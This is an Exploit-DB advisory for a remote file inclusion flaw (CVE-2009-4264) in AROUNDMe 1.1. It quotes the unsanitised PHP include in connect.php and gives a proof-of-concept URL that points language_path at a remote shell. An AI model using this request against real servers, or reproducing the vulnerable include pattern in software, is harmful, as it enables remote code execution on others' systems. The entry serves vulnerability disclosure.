AROUNDMe <= 1.1 language_path Remote File Include Exploit

2009-12-06T00:00:00
ID EDB-ID:10329
Type exploitdb
Reporter cr4wl3r
Modified 2009-12-06T00:00:00

Description

AROUNDMe <= 1.1 (language_path) Remote File Include Exploit. CVE-2009-4264. Webapps exploit for php platform

                                        
                                               [ Discovered by cr4wl3r \ Indonesian Hacker ]

########################################################################
3rr0r: ./aroundme_1_1/aroundme/components/core/connect.php (line 25)

       &lt;?php
           include_once($language_path . 'connect.lang.php');
       ?&gt;
########################################################################

########################################################################
PoC  :   http://server/[path]/components/core/connect.php?language_path=[Shell]
########################################################################

########################################################################
#Contact Me : cr4wl3r[4t]linuxmail[dot]org
########################################################################


   [ Gorontalo / 2009 ]